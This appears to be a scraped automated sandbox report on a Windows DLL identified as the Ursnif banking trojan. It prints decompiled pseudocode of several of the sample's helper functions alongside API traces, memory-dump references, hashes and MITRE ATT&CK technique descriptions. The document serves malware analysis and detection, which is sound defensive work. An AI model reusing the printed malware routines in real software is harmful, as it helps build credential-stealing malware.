				_t4 = _t17 + 0x2bde9ea; // 0x6f577349
				 *0x2bdd2ac = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x2bdd2d8 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x02bd27cb
0x02bd27d0
0x02bd27d5
0x02bd27dd
0x02bd2813
0x02bd2815
0x02bd281c
0x02bd2820
0x02bd2822
0x02bd2822
0x02bd2820
0x02bd2825
0x02bd282a
0x02bd282a
0x02bd27df
0x02bd27e4
0x02bd27eb
0x02bd27f1
0x02bd27f7
0x02bd27ff
0x02bd2804
0x02bd280a
0x02bd2811
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,02BD26C2,?,00000001,?,?,?,02BD1900,?), ref: 02BD27EB
GetProcAddress.KERNEL32(00000000,6F577349), ref: 02BD2804

Strings

Nt, xrefs: 02BD2804

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Nt
API String ID: 1646373207-3999644925
Opcode ID: 1ecf20991aeaef7d954a186bd309cfb8b6e3ef6c6f01431a29c433807ade7488
Instruction ID: e774b67f3882ab0df6d955a1fdd5376cafe8b4207296b7ac932b6b289f729320
Opcode Fuzzy Hash: 1ecf20991aeaef7d954a186bd309cfb8b6e3ef6c6f01431a29c433807ade7488
Instruction Fuzzy Hash: BFF0AF72D82207DFDB05CB94D964BDA33A8EF08388B000489E841D3140F735FA10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2291, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD2291(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E02BD75F6(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E02BD4AAB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}

0x02bd229a
0x02bd22a4
0x02bd22a8
0x02bd22b0
0x02bd22b4
0x02bd22c3
0x02bd22c8
0x02bd22c8
0x02bd22b4
0x02bd22cf

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD1083,73797325), ref: 02BD22A2

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD22BC

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

Strings

PGt, xrefs: 02BD2292

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: PGt
API String ID: 1564683301-293773470
Opcode ID: f16d5b9818ed6a1d372b6b935bd6f8fcbe1f99a2802ec5af678b432e98b388e2
Instruction ID: 15d568082954a503bc12f5e17106bf8b9b450ad2582afff9e56bb62c477e56bf
Opcode Fuzzy Hash: f16d5b9818ed6a1d372b6b935bd6f8fcbe1f99a2802ec5af678b432e98b388e2
Instruction Fuzzy Hash: F6E04F3260257226423259AA4C44EDBDEADEFE6AF570501A5FD48D3212FB20C811E6F5

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1EC1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02BD1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02BD75F6(_t2);
				if(_t34 != 0) {
					_t30 = E02BD75F6(_t28);
					if(_t30 == 0) {
						E02BD4AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02BDA971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02BDA971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02bd1ec1
0x02bd1ecb
0x02bd1ecd
0x02bd1ed3
0x02bd1ed3
0x02bd1edc
0x02bd1ee0
0x02bd1eec
0x02bd1ef0
0x02bd1f64
0x02bd1ef2
0x02bd1ef2
0x02bd1ef6
0x02bd1efb
0x02bd1f00
0x02bd1f1a
0x02bd1f09
0x02bd1f09
0x02bd1f0d
0x02bd1f10
0x02bd1f15
0x02bd1f15
0x02bd1f1f
0x02bd1f47
0x02bd1f4d
0x02bd1f50
0x02bd1f21
0x02bd1f23
0x02bd1f2b
0x02bd1f36
0x02bd1f3b
0x02bd1f3b
0x02bd1f57
0x02bd1f5e
0x02bd1f5f
0x02bd1f5f
0x02bd1ef0
0x02bd1f6f

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,02BD5405,00000000,00000000,74E481D0,06749618,?,?,02BD2A8A,?,06749618), ref: 02BD1ECD

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

Part of subcall function 02BDA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BD1EFB,00000000,00000001,00000001,?,?,02BD5405,00000000,00000000,74E481D0,06749618), ref: 02BDA97F
Part of subcall function 02BDA971: StrChrA.SHLWAPI(?,0000003F,?,?,02BD5405,00000000,00000000,74E481D0,06749618,?,?,02BD2A8A,?,06749618,0000EA60,?), ref: 02BDA989

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD5405,00000000,00000000,74E481D0,06749618,?,?,02BD2A8A), ref: 02BD1F2B
lstrcpy.KERNEL32(00000000,74E481D0), ref: 02BD1F3B
lstrcpy.KERNEL32(00000000,00000000), ref: 02BD1F47

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 358f803f3306b870d2244422532b3ff6a0f3f6dd6b43be6e2f76c01a5f2f5630
Instruction ID: de84b39beb25452d0bf374eff9d8a4c37fb4ccbc6e94658da5078c8dfc7699c0
Opcode Fuzzy Hash: 358f803f3306b870d2244422532b3ff6a0f3f6dd6b43be6e2f76c01a5f2f5630
Instruction Fuzzy Hash: 8921B172904256AFCB025F78C884AEABFB9EF06384B158095FD089B211FB34D940CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD131E, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02BD75F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02bd1333
0x02bd1337
0x02bd1341
0x02bd1346
0x02bd134b
0x02bd134d
0x02bd1355
0x02bd135a
0x02bd1368
0x02bd136d
0x02bd1377

APIs

lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,06749364,?,02BD50AD,004F0053,06749364,?,?,?,?,?,?,02BD54EF), ref: 02BD132E
lstrlenW.KERNEL32(02BD50AD,?,02BD50AD,004F0053,06749364,?,?,?,?,?,?,02BD54EF), ref: 02BD1335

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,02BD50AD,004F0053,06749364,?,?,?,?,?,?,02BD54EF), ref: 02BD1355
memcpy.NTDLL(74E069A0,02BD50AD,00000002,00000000,004F0053,74E069A0,?,?,02BD50AD,004F0053,06749364), ref: 02BD1368

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: d0123c168c1bdf7a9e79ab0db3cbb6ee6729c772b7959f82f1c3b857ab84f62f
Instruction ID: 2256e8399037d8c32bc1940c149f2847ce1336fdb5f74e7bc9c9050ba8624190
Opcode Fuzzy Hash: d0123c168c1bdf7a9e79ab0db3cbb6ee6729c772b7959f82f1c3b857ab84f62f
Instruction Fuzzy Hash: 9DF0EC76910119BBCF11EBA9CC44CDF7BADEF492987154462ED08D7101F671EA14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD38CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(06749AF0,00000000,00000000,7691C740,02BD467E,00000000), ref: 02BD38DA
lstrlen.KERNEL32(?), ref: 02BD38E2

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

lstrcpy.KERNEL32(00000000,06749AF0), ref: 02BD38F6
lstrcat.KERNEL32(00000000,?), ref: 02BD3901

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f5376b1e8f78a8c12f783aae31e163a650e234b2238fe8a868a2a018ccf46d80
Instruction ID: 3c78bb8d6281e47d54047fa6cb4f502546883fee4f6140e799e8cf67d141de23
Opcode Fuzzy Hash: f5376b1e8f78a8c12f783aae31e163a650e234b2238fe8a868a2a018ccf46d80
Instruction Fuzzy Hash: ADE092339026216787119BE8AC48CEBFFADEF896A03044867FA00D3101E7248821CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 6856 Parent PID: 3352 mshta.exeCOMMON

Executed Functions

Function 000001A5B96E0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000003.640160825.000001A5B96E0000.00000010.00000001.sdmp, Offset: 000001A5B96E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 38dba2d3b6ef40b942ec5ea3fa259a99a75db6a0ee02900cb99242943a1c224b
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 3A90021499EC0695D51415D10C4539C5052A38A251FD44884C826D0144D54D02A61563

Uniqueness

Uniqueness Score: -1.00%

Function 000001A5B96E0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000003.640160825.000001A5B96E0000.00000010.00000001.sdmp, Offset: 000001A5B96E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 38dba2d3b6ef40b942ec5ea3fa259a99a75db6a0ee02900cb99242943a1c224b
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 3A90021499EC0695D51415D10C4539C5052A38A251FD44884C826D0144D54D02A61563

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mshta.exe PID: 5772 Parent PID: 3352 mshta.exeCOMMON

Executed Functions

Function 0000023B4F740FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000003.650708328.0000023B4F740000.00000010.00000001.sdmp, Offset: 0000023B4F740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 246cda76a9e98fa9ac1a84abf23a24b59aba8e212acb5c97bfc4bdb5a692b6d9
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 61900404CDD51755D51515D11D5D35C704077CC150FD444D04F37D11C7D54D03D71157

Uniqueness

Uniqueness Score: -1.00%

Function 0000023B4F740FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000003.650708328.0000023B4F740000.00000010.00000001.sdmp, Offset: 0000023B4F740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 246cda76a9e98fa9ac1a84abf23a24b59aba8e212acb5c97bfc4bdb5a692b6d9
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 61900404CDD51755D51515D11D5D35C704077CC150FD444D04F37D11C7D54D03D71157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre